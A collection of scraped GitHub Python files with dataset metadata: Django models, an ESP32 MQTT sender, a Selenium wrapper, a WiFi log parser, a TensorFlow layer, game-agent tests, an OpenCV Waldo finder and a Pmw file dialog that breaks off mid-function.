c1f9bdee162eb8870f5e99d07e1132ddbc03d481 | 2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae | /python/python_14019.py | 78da2db51c32750262ee6905da1673496452c3d7 | [] | no_license | AK-1121/code_extraction | cc812b6832b112e3ffcc2bb7eb4237fd85c88c01 | 5297a4a3aab3bb37efa24a89636935da04a1f8b6 | refs/heads/master | 2020-05-23T08:04:11.789141 | 2015-10-22T19:19:40 | 2015-10-22T19:19:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 52 | py | # If comparison statements in Python
random.randint
| [
"ubuntu@ip-172-31-7-228.us-west-2.compute.internal"
] | ubuntu@ip-172-31-7-228.us-west-2.compute.internal |
97cf5f474dbcb921ff3bb64b3d27c55e10d7af24 | c0aa558e50e03250a7b397536aaa5a50cd6adb1d | /abstract/models.py | 987d640bae74e6aafc8169671add22273bdd999a | [] | no_license | Stevvvvvi/djangoapifinal | 04264ee0de4fa0d116428b04c2ab20715b8a5530 | 9eca3111f6bb2177a01cadd6b0f38222f6ab85a3 | refs/heads/main | 2023-07-26T21:09:24.487022 | 2021-08-22T10:33:45 | 2021-08-22T10:33:45 | 396,653,791 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 526 | py | from django.db import models
from django.utils import timezone
class AbstractModel(models.Model):
created = models.DateTimeField(editable=False)
modified = models.DateTimeField(editable=False)
def save(self, *args, **kwargs):
''' On save, update timestamps '''
if not self.id:
self.created = timezone.now()
self.modified = timezone.now()
return super(AbstractModel, self).save(*args, **kwargs)
class Meta:
abstract=True
ordering=('-created',) | [
"lly363893886@gmail.com"
] | lly363893886@gmail.com |
19638813a0f884202f522998d7ee776521014b31 | ba712db29e8bf09b506ec4c1adbc2b3eeb359098 | /InputOutputOperations/argv_demo.py | a60ab784f9615d7fdbd6fc258d10286f70ccb271 | [] | no_license | Prog-keith/Learning_Python | a7c20b6e42fb59282d0aba109bc70dc0bb8bf553 | c949862c8817e6ac73bb41ff8ad7a7811a432870 | refs/heads/main | 2023-08-27T21:37:49.107754 | 2021-10-14T11:39:38 | 2021-10-14T11:39:38 | 416,299,075 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 724 | py | '''Accept command line arguments to the module'''
program = 'agrv_demo.py'
source = 'default.src'
dest = 'default.dst'
def show_config():
print('Here is the currant configuration : ')
print('Program : %s' % program)
print('Source : %s' % source)
print('Destination : &s' % dest)
if __name__ == '__main__' :
import sys
print('here is sys.argv : %s ' % sys.argv)
if len(sys.argv) > 2: #Two or more arguments passed
program, source, dest = sys.argv[:3]
elif len(sys.argv) > 1: #Only one argument passed
program, source = sys.argv[:2]
else: #No arguments passed
program = sys.argv[0]
show_config()
| [
"noreply@github.com"
] | Prog-keith.noreply@github.com |
683dd671bc35020db12458343d8ca3a19d8b0fdb | 3090af6950b8edb465c5e67ac5a88bf6428330f4 | /ESP32/main_sendRandom.py | 33bd84c35132ea80749bfc51d03df502451991a1 | [] | no_license | NickBaik/SAP_IoT_Test | 8f63b8d54f940d7f61b43716b0dd5f3dcd95291b | f505b3aaf742169ac3be30812a2bcda40cba2149 | refs/heads/master | 2021-04-12T12:04:24.024763 | 2018-04-13T01:56:39 | 2018-04-13T01:56:39 | 126,653,173 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 601 | py | import network
from time import sleep
from umqtt.simple import MQTTClient
from machine import Pin
from dht import DHT11
import random
station = network.WLAN(network.STA_IF)
station.active(True)
station.connect("Baek","82388238")
sleep(5)
SERVER = '192.168.43.251'
CLIENT_ID = 'ESP32_DHT11_Sensor'
TOPIC = b'temp_humidity'
client = MQTTClient(CLIENT_ID, SERVER)
client.connect()
while True:
try:
input_random1=random.randint(0,100)
msg = str(input_random1)
client.publish(TOPIC, msg)
print(msg)
except OSError:
print('Failed to read sensor.')
sleep(4)
| [
"sollip1228@gmail.com"
] | sollip1228@gmail.com |
eba8df431abff8bd3ccc3b669c965283f356be6d | 1c6db771456c0ad1c09d7aebf8c202cdd3f20cb8 | /src/driver/chrome_driver.py | 61a1092763ddc54aa0fc1946c513554ac941c5c0 | [] | no_license | dicebattle/DynamicCrawler | e964badf57d127e0d0b536e92c5810c9184aad93 | 3c9e0b490c44280ffb61e598b14761d237de2334 | refs/heads/master | 2021-01-23T01:08:32.730729 | 2017-06-09T17:43:07 | 2017-06-09T17:43:07 | 85,880,316 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 795 | py | import os
from selenium import webdriver
from driver.abstract_driver import AbstractDriver
class ChromeDriver(AbstractDriver):
def load_webpage(self, url):
self.driver.get(url)
raw_html = self.driver.page_source
def __del__(self):
super().__del__()
self.driver.quit()
def __init__(self):
super().__init__()
chrome_options = webdriver.ChromeOptions()
prefs = {"profile.managed_default_content_settings.images": 2}
chrome_options.add_experimental_option("prefs", prefs)
chrome_options.add_argument("--headless")
chrome_options.add_argument("--disable-gpu")
self.driver = webdriver.Chrome(os.getcwd() + '/../lib/chromedriver',
chrome_options=chrome_options) | [
"dicebattle@gmail.com"
] | dicebattle@gmail.com |
fd993c1ce8b8ab1eac686e7002a4c8c17b291d47 | 727b31431a9a5cf5c2c7c9c98cf610b274cc9c9a | /WIFI_similarity/Init_process_wifi.py | 2712e29b1ca39de993e537db159e359bdeba48e4 | [] | no_license | wangfengfighting/GPS_Similar | 46c9b97c92d055a7c7d96288ae11727c7ecfe927 | 0f1d5da6820782284c6e90eeda83d4e3fb73a19f | refs/heads/master | 2021-01-21T04:59:24.846677 | 2016-07-26T03:17:08 | 2016-07-26T03:17:08 | 44,645,011 | 2 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,795 | py | # coding: utf-8
__author__ = 'Administrator'
from getDir import GetDirName
import os
import json
import numpy as np
import sys
def get_fenlei_user():
wifi_path=[]
getdir=GetDirName()
parent_path = os.path.dirname(os.getcwd())
AllUserFiles,AllFiles,other=getdir.getUserFiles(parent_path+os.sep+'starlog')
for path_file in other:
for i in range(len(path_file)):
path_file_name=parent_path+path_file[i]+os.sep+'wifi.txt'
wifi_path.append(path_file_name)
return wifi_path
def wifi_file_filter(wifi_file_path):
for path in wifi_file_path:
if os.path.exists(path):
reload(sys)
sys.setdefaultencoding( "utf-8" )
f=open(path.replace('wifi.txt','Downwifi.txt'),'w')
f.writelines('SSID,BSSID,state,time,level')
f.write('\n')
prefile=open(path,'r').readlines()
for line in prefile:
s=json.loads(line)
#print s['Wifi']['SSID']
if s['Wifi']['SSID']=='':
f.write('HIDE')
elif not s['Wifi']['SSID'].strip():
f.write('Unkonwn')
else:
f.write(str(s['Wifi']['SSID']).strip('\n'))
f.write(',')
f.write(str(s['Wifi']['BSSID']).strip('\n'))
f.write(',')
f.write(str(s['Wifi']['state']).strip('\n'))
f.write(',')
f.write(str(s['Wifi']['time']).strip('\n'))
f.write(',')
f.write(str(s['Wifi']['level']).strip('\n'))
f.write('\n')
f.close()
else:
pass
if __name__=='__main__':
#print get_fenlei_user()
wifi_file_filter(get_fenlei_user()) | [
"757001119@qq.com"
] | 757001119@qq.com |
574ef5e88ee135257b5f436296d7e5aa2e4dc576 | f87c0fabadacc1db3892de6aae6792e870866999 | /DjangoDemo/wsgi.py | 621037ca69a528ad7c44d9f4dd4f3e4365f3b914 | [
"Apache-2.0"
] | permissive | wangjianxiandev/DjangoDemo | c263c013bee615e21e9878af5dec59202a4260b8 | 36dc24f64745b3bec1aedf857525aaa9961a3e46 | refs/heads/master | 2022-12-23T20:47:59.755777 | 2019-05-10T00:08:37 | 2019-05-10T00:08:37 | 155,325,131 | 0 | 1 | Apache-2.0 | 2022-06-21T21:30:02 | 2018-10-30T04:37:58 | Python | UTF-8 | Python | false | false | 430 | py | """
WSGI config for DjangoDemo project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/howto/deployment/wsgi/
"""
import os
from dj_static import Cling
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'DjangoDemo.settings')
application = Cling(get_wsgi_application()) | [
"jianxianwang198@163.com"
] | jianxianwang198@163.com |
72459b0f1f791bab9d41e5408b39c9a351bd2ddc | c92d6e56c9859d80a57c43898123b4ae6b7128e0 | /chatbot_tutorial/migrations/0015_allcalls_user.py | 07c4624c8331ab96b75b72b5ff4ca1dc14c5995b | [
"MIT"
] | permissive | Jishin4477/Djangobot | 566ee8fabdf443b8bded9c82e8808a26317364a2 | f7a4d78b8d12253a8e6726931c85ee76f436d440 | refs/heads/main | 2023-06-08T02:59:03.707985 | 2023-05-31T06:43:33 | 2023-05-31T06:43:33 | 354,270,715 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 677 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.29 on 2021-04-02 15:55
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('chatbot_tutorial', '0014_remove_allcalls_user'),
]
operations = [
migrations.AddField(
model_name='allcalls',
name='user',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
| [
"jishinc@growthplug.com"
] | jishinc@growthplug.com |
ae46f6212c12031979831196073e280f171689bd | 082adc8ad69722c1d927e7a3a799a8667cf51a9c | /tfs/core/layer/fc.py | bfe77246e9b93474fa0dfae7482082f2a1d7fe3b | [] | no_license | crackhopper/InitCNNKernel | c04164365367a71e706c46391ce6a9b51b0f9793 | d0e5e8def9ef01dd0f25d191fc9f9da9acab6d23 | refs/heads/master | 2021-09-04T02:21:30.971073 | 2018-01-14T15:56:29 | 2018-01-14T15:56:29 | 115,786,040 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,640 | py | import tensorflow as tf
import numpy as np
import tfs.core.initializer.init_func as init
from tfs.core.layer import ops
from tfs.core.layer.base import Layer
class FullyConnect(Layer):
def __init__(self,
net,
outdim,
activation = ops.relu,
name=None,
print_names=['outdim','activation']
):
vtable = locals()
del vtable['self']
del vtable['net']
super(FullyConnect,self).__init__(net,**vtable)
def _build(self):
inTensor = self._in
input_shape = inTensor.get_shape()
if input_shape.ndims == 4:
# The input is spatial. Vectorize it first.
dim = np.prod(input_shape.as_list()[1:])
output = tf.reshape(inTensor, [-1,dim])
else:
output, dim = (inTensor, input_shape[-1].value)
weights = self._make_variable('weights', shape=[dim, self.param.outdim],init=init.xavier())
biases = self._make_variable('biases', [self.param.outdim],init=init.constant())
output = tf.nn.xw_plus_b(output, weights, biases,name=self.name)
if self.param.activation:
output= self.param.activation(output, name=self.name)
return output
def _inverse(self):
outTensor = self._inv_in
name = 'inv_'+self.name
act = self.param.activation
if act:
outTensor = act(outTensor)
weights = tf.transpose(self._variables['weights'])
inv_fc = tf.matmul(outTensor,weights)
shape = self._in.get_shape().as_list()
shape[0]=-1
inv_fc = tf.reshape(inv_fc,shape)
print('inv_fc '+str(outTensor.get_shape().as_list()) + '->' + str(inv_fc.get_shape().as_list()))
return inv_fc
| [
"Xiang Li"
] | Xiang Li |
6ad85fa1a294e558957c5db9cd527a55dc2c2245 | 8d863809a4e9a1a907e2e12845d5b7dad7353035 | /tests/test_my_custom_player.py | 9322b854f59bc894fc66b19bd00de9fdb5012fc8 | [
"MIT"
] | permissive | AekachaiTang/AINDP3 | c2cbba5832f3115213edd413cf422a942111bbbf | b50a3d522f4e7a2b74b294a141804873ea8d8182 | refs/heads/master | 2021-04-12T16:50:01.096182 | 2020-03-22T08:54:01 | 2020-03-22T08:54:01 | 249,093,595 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,522 | py |
import unittest
from collections import deque
from random import choice
from textwrap import dedent
from isolation import Isolation, Agent, fork_get_action, play
from sample_players import RandomPlayer
from my_custom_player import CustomPlayer
class BaseCustomPlayerTest(unittest.TestCase):
def setUp(self):
self.time_limit = 150
self.move_0_state = Isolation()
self.move_1_state = self.move_0_state.result(choice(self.move_0_state.actions()))
self.move_2_state = self.move_1_state.result(choice(self.move_1_state.actions()))
terminal_state = self.move_2_state
while not terminal_state.terminal_test():
terminal_state = terminal_state.result(choice(terminal_state.actions()))
self.terminal_state = terminal_state
class CustomPlayerGetActionTest(BaseCustomPlayerTest):
def _test_state(self, state):
agent = CustomPlayer(state.ply_count % 2)
action = fork_get_action(state, agent, self.time_limit)
self.assertTrue(action in state.actions(), dedent("""\
Your agent did not call self.queue.put() with a valid action \
within {} milliseconds from state {}
""").format(self.time_limit, state))
def test_get_action_player1(self):
""" get_action() calls self.queue.put() before timeout on an empty board """
self._test_state(self.move_0_state)
def test_get_action_player2(self):
""" get_action() calls self.queue.put() before timeout as player 2 """
self._test_state(self.move_1_state)
def test_get_action_midgame(self):
""" get_action() calls self.queue.put() before timeout in a game in progress """
self._test_state(self.move_2_state)
def test_get_action_terminal(self):
""" get_action() calls self.queue.put() before timeout when the game is over """
self._test_state(self.terminal_state)
class CustomPlayerPlayTest(BaseCustomPlayerTest):
def test_custom_player(self):
""" CustomPlayer successfully completes a game against itself """
agents = (Agent(CustomPlayer, "Player 1"),
Agent(CustomPlayer, "Player 2"))
initial_state = Isolation()
winner, game_history, _ = play((agents, initial_state, self.time_limit, 0))
state = initial_state
moves = deque(game_history)
while moves: state = state.result(moves.popleft())
self.assertTrue(state.terminal_test(), "Your agent did not play until a terminal state.") | [
"noreply@github.com"
] | AekachaiTang.noreply@github.com |
61ddc0bcbbe298d39cd724efda1b2e1fef76e38a | 92d2e5f894c4ad714497246f2ebfb669f195f5c6 | /PageSpider/utilities/database_utilities.py | 2548027b12cbacf79e566058867bd36a26189e25 | [] | no_license | glennsobs/glennsobs | 3b800c609c1b14883f36e2d81bfb50f3d2f0b799 | d0307371102436c1ae151e9f6a8813e1f56b1a29 | refs/heads/master | 2020-07-03T05:59:46.259167 | 2019-09-08T21:04:49 | 2019-09-08T21:04:49 | 201,808,020 | 0 | 0 | null | 2019-08-16T01:03:23 | 2019-08-11T19:43:47 | null | UTF-8 | Python | false | false | 197 | py | def create_database(database_path: str):
#todo: generate database
pass
def save_words_to_database(database_path:str, words_list: list):
#todo: save the words to the database
pass
| [
"54005758+glennsobs@users.noreply.github.com"
] | 54005758+glennsobs@users.noreply.github.com |
497a37accb9bca07ff11a2b40b7c4eef68a23c2b | 4ffa02a24fcfc553c767ce581f8a9c1433cdda18 | /Algorithms on Graphs/week2_graph_decompostion2/1_cs_curriculum.py | 780d20c599b4fb68cc2fa1e8924487c595acd3c6 | [] | no_license | chensandian/Coursera_Data_structure_and_algorithms | 9198e24f3f73968e30fb0d5d01bb1ab3a7a159fd | ff166b743a6efd7d252397a157a2613f3beb73cd | refs/heads/main | 2023-07-15T07:52:29.116465 | 2021-08-23T00:13:44 | 2021-08-23T00:13:44 | 385,505,221 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,119 | py | # Uses python3
import sys
def acyclic(adj):
visited = [0 for _ in range(len(adj))]
rec_stack = [0 for _ in range(len(adj))]
for i in range(len(adj)):
if not visited[i]:
if dfs(adj, i, visited, rec_stack):
return 1
return 0
def dfs(adj, x, visited, rec_stack):
# this will mark the points we traveled
visited[x] = 1
# this will mark the points we traveled but come back due to dead end
# 1 marks we go pass; 0 marks we get back
rec_stack[x] = 1
for neighbor in adj[x]:
if visited[neighbor] == 0 and dfs(adj, neighbor, visited, rec_stack):
return 1
elif rec_stack[neighbor] == 1:
return 1
# if we get to this part, that means we reached a dead end
rec_stack[x] = 0
return 0
if __name__ == '__main__':
input = sys.stdin.read()
data = list(map(int, input.split()))
n, m = data[0:2]
data = data[2:]
edges = list(zip(data[0:(2 * m):2], data[1:(2 * m):2]))
adj = [[] for _ in range(n)]
for (a, b) in edges:
adj[a - 1].append(b - 1)
print(acyclic(adj))
| [
"noreply@github.com"
] | chensandian.noreply@github.com |
3ab2e88cab6ef1dcb9caf2b4448277d18674f61f | 2d307cb2da18f35e2d4e73f6e042a48cdcd8af5e | /finder.py | c6b440ead672bdf61860f237a09a569b0960c9b5 | [] | no_license | andrewcunningham33/Where-s-Waldo-Finder | f6c1ca64e8aadf5c9ceb0892a2528ae6cf7bffb0 | be64784c1a2375372410342db9a744a06d98cd03 | refs/heads/master | 2022-07-26T00:35:26.667876 | 2020-05-19T13:10:30 | 2020-05-19T13:10:30 | 265,250,272 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,051 | py | # import the necessary packages
import numpy as np
import argparse
import imutils
from matplotlib import pyplot as plt
import cv2
# Use command line arguments to read puzzles
ap = argparse.ArgumentParser()
ap.add_argument("-p", "--puzzle", required = True,
help = "Path to the puzzle image")
ap.add_argument("-w", "--waldo", required = True,
help = "Path to the waldo image")
args = vars(ap.parse_args())
puzzle = cv2.imread('find_waldo.jpg')
img_gray = cv2.cvtColor(puzzle, cv2.COLOR_BGR2GRAY)
waldo = cv2.imread('waldo.png',0)
# store width and height
w, h = waldo.shape[::-1]
res = cv2.matchTemplate(img_gray,waldo,cv2.TM_CCOEFF_NORMED)
threshold = 0.6
# finding values exceeding threshold
loc = np.where( res >= threshold)
for pt in zip(*loc[::-1]):
#draw rectangle on places where it exceeds threshold
cv2.rectangle(puzzle, pt, (pt[0] + w, pt[1] + h), (0,255,0), 2)
cv2.imshow("Puzzle", imutils.resize(puzzle, height = 650))
cv2.waitKey(0)
# Offer to make Waldo more clear
user_input = input("Press 1 if your having trouble seeing Waldo \n")
user_int_put = int(user_input)
if user_int_put == 1:
puzzle = cv2.imread(args["puzzle"])
waldo = cv2.imread(args["waldo"])
(wHeight, wWidth) = waldo.shape[:2]
#find the waldo in the puzzle
result = cv2.matchTemplate(puzzle, waldo, cv2.TM_CCOEFF)
(_, _, minLoc, maxLoc) = cv2.minMaxLoc(result)
# the puzzle image
topLeft = maxLoc
botRight = (topLeft[0] + wWidth, topLeft[1] + wHeight)
roi = puzzle[topLeft[1]:botRight[1], topLeft[0]:botRight[0]]
# construct a darkened transparent 'layer' to darken everything
# in the puzzle except for waldo
mask = np.zeros(puzzle.shape, dtype = "uint8")
puzzle = cv2.addWeighted(puzzle, 0.25, mask, 0.75, 0)
# put the original waldo back in the image so that he is
# 'brighter' than the rest of the image
puzzle[topLeft[1]:botRight[1], topLeft[0]:botRight[0]] = roi
# display the images
cv2.imshow("Puzzle", imutils.resize(puzzle, height = 650))
cv2.waitKey(0)
| [
"noreply@github.com"
] | andrewcunningham33.noreply@github.com |
25e0f060c6bbb381ef0adce82ef475fb49accea2 | 7a23870e9b0b56b112f634d26760282ff7a4f46c | /Projects/Archived Tk code/From extensions folder/Pmw/Pmw_1_3/contrib/PmwFileDialog.py | b11001ca1e80505bdb49d27b9cd04f81218da196 | [] | no_license | leo-editor/leo-editor-contrib | 0c671998c4ec7fd7c4ce890a201395afe340481b | 28c22721e1bc313c120a8a6c288893bc566a5c67 | refs/heads/master | 2023-06-25T04:28:54.520792 | 2023-06-14T20:18:12 | 2023-06-14T20:18:12 | 16,771,641 | 6 | 6 | null | 2023-06-09T11:26:42 | 2014-02-12T15:28:36 | Python | UTF-8 | Python | false | false | 14,836 | py | #
__version__ = '$Id: PmwFileDialog.py,v 1.1 2007/12/13 16:06:01 edream Exp $'
#
# Filename dialogs using Pmw
#
# (C) Rob W.W. Hooft, Nonius BV, 1998
#
# Modifications:
#
# J. Willem M. Nissink, Cambridge Crystallographic Data Centre, 8/2002
# Added optional information pane at top of dialog; if option
# 'info' is specified, the text given will be shown (in blue).
# Modified example to show both file and directory-type dialog
#
# No Guarantees. Distribute Freely.
# Please send bug-fixes/patches/features to <r.hooft@euromail.com>
#
################################################################################
import os,fnmatch,time
import Tkinter,Pmw
#Pmw.setversion("0.8.5")
def _errorpop(master,text):
    """Pop up a modal error message box with a single OK button.

    The dialog is destroyed as soon as the user dismisses it.
    """
    dialog = Pmw.MessageDialog(
        master,
        title="Error",
        message_text=text,
        buttons=("OK",))
    # Give the message label some padding before going modal.
    dialog.component('message').pack(ipadx=15, ipady=15)
    dialog.activate()
    dialog.destroy()
class PmwFileDialog(Pmw.Dialog):
    """Modal file-selection dialog built from Pmw megawidgets.

    Megawidget options:
        filter     -- glob pattern used to filter the file listing ('*')
        directory  -- directory currently being browsed (defaults to cwd)
        filename   -- currently selected file name (stored as a full path)
        historylen -- max number of remembered entries per combobox
        command    -- optional callable invoked whenever a filename is set
        info       -- optional text shown in an information pane at the top

    Client code normally calls askfilename(), which activates the dialog
    and returns the chosen filename, or None when the user cancels.
    """
    def __init__(self, parent = None, **kw):
        # Define the megawidget options.
        # Each tuple is (name, default, callback-run-when-option-is-set).
        optiondefs = (
            ('filter', '*', self.newfilter),
            ('directory', os.getcwd(), self.newdir),
            ('filename', '', self.newfilename),
            ('historylen',10, None),
            ('command', None, None),
            ('info', None, None),
        )
        self.defineoptions(kw, optiondefs)
        # Initialise base class (after defining options).
        Pmw.Dialog.__init__(self, parent)
        self.withdraw()
        # Create the components.
        interior = self.interior()
        # The optional info pane occupies row 0; when present, every other
        # widget is shifted down one grid row via rowoffset.
        if self['info'] is not None:
            rowoffset=1
            dn = self.infotxt()
            dn.grid(row=0,column=0,columnspan=2,padx=3,pady=3)
        else:
            rowoffset=0
        dn = self.mkdn()
        dn.grid(row=0+rowoffset,column=0,columnspan=2,padx=3,pady=3)
        del dn
        # Create the directory list component.
        dnb = self.mkdnb()
        dnb.grid(row=1+rowoffset,column=0,sticky='news',padx=3,pady=3)
        del dnb
        # Create the filename list component.
        fnb = self.mkfnb()
        fnb.grid(row=1+rowoffset,column=1,sticky='news',padx=3,pady=3)
        del fnb
        # Create the filter entry
        ft = self.mkft()
        ft.grid(row=2+rowoffset,column=0,columnspan=2,padx=3,pady=3)
        del ft
        # Create the filename entry; <Return> acts like pressing OK.
        fn = self.mkfn()
        fn.grid(row=3+rowoffset,column=0,columnspan=2,padx=3,pady=3)
        fn.bind('<Return>',self.okbutton)
        del fn
        # Buttonbox already exists (created by Pmw.Dialog); just add buttons.
        bb=self.component('buttonbox')
        bb.add('OK',command=self.okbutton)
        bb.add('Cancel',command=self.cancelbutton)
        del bb
        # Line up the labels of the three labelled comboboxes.
        Pmw.alignlabels([self.component('filename'),
                         self.component('filter'),
                         self.component('dirname')])
    def infotxt(self):
        """ Make information block component at the top """
        return self.createcomponent(
            'infobox',
            (), None,
            Tkinter.Label, (self.interior(),),
            width=51,
            relief='groove',
            foreground='darkblue',
            justify='left',
            text=self['info']
        )
    def mkdn(self):
        """Make directory name component (combobox with history)."""
        return self.createcomponent(
            'dirname',
            (), None,
            Pmw.ComboBox, (self.interior(),),
            entryfield_value=self['directory'],
            entryfield_entry_width=40,
            entryfield_validate=self.dirvalidate,
            selectioncommand=self.setdir,
            labelpos='w',
            label_text='Directory:')
    def mkdnb(self):
        """Make directory name box (scrolled list of subdirectories)."""
        return self.createcomponent(
            'dirnamebox',
            (), None,
            Pmw.ScrolledListBox, (self.interior(),),
            label_text='directories',
            labelpos='n',
            hscrollmode='none',
            dblclickcommand=self.selectdir)
    def mkft(self):
        """Make filter combobox (glob pattern applied to file names)."""
        return self.createcomponent(
            'filter',
            (), None,
            Pmw.ComboBox, (self.interior(),),
            entryfield_value=self['filter'],
            entryfield_entry_width=40,
            selectioncommand=self.setfilter,
            labelpos='w',
            label_text='Filter:')
    def mkfnb(self):
        """Make filename list box (single click selects, double click OKs)."""
        return self.createcomponent(
            'filenamebox',
            (), None,
            Pmw.ScrolledListBox, (self.interior(),),
            label_text='files',
            labelpos='n',
            hscrollmode='none',
            selectioncommand=self.singleselectfile,
            dblclickcommand=self.selectfile)
    def mkfn(self):
        """Make file name entry (combobox with history)."""
        return self.createcomponent(
            'filename',
            (), None,
            Pmw.ComboBox, (self.interior(),),
            entryfield_value=self['filename'],
            entryfield_entry_width=40,
            entryfield_validate=self.filevalidate,
            selectioncommand=self.setfilename,
            labelpos='w',
            label_text='Filename:')
    def dirvalidate(self,string):
        # Entry validator: only an existing directory counts as complete.
        if os.path.isdir(string):
            return Pmw.OK
        else:
            return Pmw.PARTIAL
    def filevalidate(self,string):
        # Entry validator: empty is incomplete; an existing regular file is
        # valid; an existing non-file (e.g. a directory) is incomplete; a
        # non-existent path is accepted (the user may be naming a new file).
        if string=='':
            return Pmw.PARTIAL
        elif os.path.isfile(string):
            return Pmw.OK
        elif os.path.exists(string):
            return Pmw.PARTIAL
        else:
            return Pmw.OK
    def okbutton(self):
        """OK action: user thinks he has input valid data and wants to
        proceed. This is also called by <Return> in the filename entry"""
        fn=self.component('filename').get()
        self.setfilename(fn)
        if self.validate(fn):
            self.canceled=0
            self.deactivate()
    def cancelbutton(self):
        """Cancel the operation"""
        self.canceled=1
        self.deactivate()
    def tidy(self,w,v):
        """Insert text v into the entry and at the top of the list of
        the combobox w, remove duplicates"""
        if not v:
            return
        entry=w.component('entry')
        entry.delete(0,'end')
        entry.insert(0,v)
        # NOTE(review): 'list' shadows the builtin of the same name within
        # this method; it refers to the combobox's scrolled list component.
        list=w.component('scrolledlist')
        list.insert(0,v)
        index=1
        # Walk the history, dropping duplicates of v and any entries beyond
        # the configured 'historylen' limit.
        while index<list.index('end'):
            k=list.get(index)
            if k==v or index>self['historylen']:
                list.delete(index)
            else:
                index=index+1
        w.checkentry()
    def setfilename(self,value):
        # Normalize the value against the current directory, update both the
        # 'directory' and 'filename' options, then fire the optional
        # 'command' callback.
        if not value:
            return
        value=os.path.join(self['directory'],value)
        dir,fil=os.path.split(value)
        self.configure(directory=dir,filename=value)
        c=self['command']
        if callable(c):
            c()
    def newfilename(self):
        """Make sure a newly set filename makes it into the combobox list"""
        self.tidy(self.component('filename'),self['filename'])
    def setfilter(self,value):
        # Selection callback for the filter combobox; triggers newfilter().
        self.configure(filter=value)
    def newfilter(self):
        """Make sure a newly set filter makes it into the combobox list"""
        self.tidy(self.component('filter'),self['filter'])
        self.fillit()
    def setdir(self,value):
        # Selection callback for the directory combobox; triggers newdir().
        self.configure(directory=value)
    def newdir(self):
        """Make sure a newly set dirname makes it into the combobox list"""
        self.tidy(self.component('dirname'),self['directory'])
        self.fillit()
    def singleselectfile(self):
        """Single click in file listbox. Move file to "filename" combobox"""
        cs=self.component('filenamebox').curselection()
        if cs!=():
            value=self.component('filenamebox').get(cs)
            self.setfilename(value)
    def selectfile(self):
        """Take the selected file from the filename, normalize it, and OK"""
        self.singleselectfile()
        value=self.component('filename').get()
        self.setfilename(value)
        if value:
            self.okbutton()
    def selectdir(self):
        """Take selected directory from the dirnamebox into the dirname"""
        cs=self.component('dirnamebox').curselection()
        if cs!=():
            value=self.component('dirnamebox').get(cs)
            dir=self['directory']
            if not dir:
                dir=os.getcwd()
            if value:
                # '..' moves up one level; anything else descends into it.
                if value=='..':
                    dir=os.path.split(dir)[0]
                else:
                    dir=os.path.join(dir,value)
            self.configure(directory=dir)
            self.fillit()
    def askfilename(self,directory=None,filter=None):
        """The actual client function. Activates the dialog, and
        returns only after a valid filename has been entered
        (return value is that filename) or when canceled (return
        value is None)"""
        if directory!=None:
            self.configure(directory=directory)
        if filter!=None:
            self.configure(filter=filter)
        self.fillit()
        self.canceled=1 # Needed for when user kills dialog window
        self.activate()
        if self.canceled:
            return None
        else:
            return self.component('filename').get()
    # Cached state used by fillit() to avoid redundant directory rescans.
    lastdir=""
    lastfilter=None
    lasttime=0
    def fillit(self):
        """Get the directory list and show it in the two listboxes"""
        # Do not run unnecessarily: skip when the directory and filter are
        # unchanged and the directory has not been modified since the last
        # scan (os.stat(...)[8] is the modification time, st_mtime).
        if self.lastdir==self['directory'] and self.lastfilter==self['filter'] and self.lasttime>os.stat(self.lastdir)[8]:
            return
        self.lastdir=self['directory']
        self.lastfilter=self['filter']
        self.lasttime=time.time()
        dir=self['directory']
        if not dir:
            dir=os.getcwd()
        dirs=['..']
        files=[]
        try:
            fl=os.listdir(dir)
            fl.sort()
        except os.error,arg:
            # errno 2/20 (ENOENT/ENOTDIR): directory vanished or is not a
            # directory any more; silently give up instead of crashing.
            if arg[0] in (2,20):
                return
            raise
        for f in fl:
            if os.path.isdir(os.path.join(dir,f)):
                dirs.append(f)
            else:
                # Only ordinary files matching the glob filter are listed.
                filter=self['filter']
                if not filter:
                    filter='*'
                if fnmatch.fnmatch(f,filter):
                    files.append(f)
        self.component('filenamebox').setlist(files)
        self.component('dirnamebox').setlist(dirs)
    def validate(self,filename):
        """Validation function. Should return 1 if the filename is valid,
        0 if invalid. May pop up dialogs to tell user why. Especially
        suited to subclasses: i.e. only return 1 if the file does/doesn't
        exist"""
        return 1
class PmwDirDialog(PmwFileDialog):
"""Directory Dialog using Pmw"""
def __init__(self, parent = None, **kw):
# Define the megawidget options.
optiondefs = (
('directory', os.getcwd(), self.newdir),
('historylen',10, None),
('command', None, None),
('info', None, None),
)
self.defineoptions(kw, optiondefs)
# Initialise base class (after defining options).
Pmw.Dialog.__init__(self, parent)
self.withdraw()
# Create the components.
interior = self.interior()
if self['info'] is not None:
rowoffset=1
dn = self.infotxt()
dn.grid(row=0,column=0,columnspan=2,padx=3,pady=3)
else:
rowoffset=0
dn = self.mkdn()
dn.grid(row=1+rowoffset,column=0,columnspan=2,padx=3,pady=3)
dn.bind('<Return>',self.okbutton)
del dn
# Create the directory list component.
dnb = self.mkdnb()
dnb.grid(row=0+rowoffset,column=0,columnspan=2,sticky='news',padx=3,pady=3)
del dnb
# Buttonbox already exists
bb=self.component('buttonbox')
bb.add('OK',command=self.okbutton)
bb.add('Cancel',command=self.cancelbutton)
del bb
lastdir=""
def fillit(self):
"""Get the directory list and show it in the two listboxes"""
# Do not run unnecesarily
if self.lastdir==self['directory']:
return
self.lastdir=self['directory']
dir=self['directory']
if not dir:
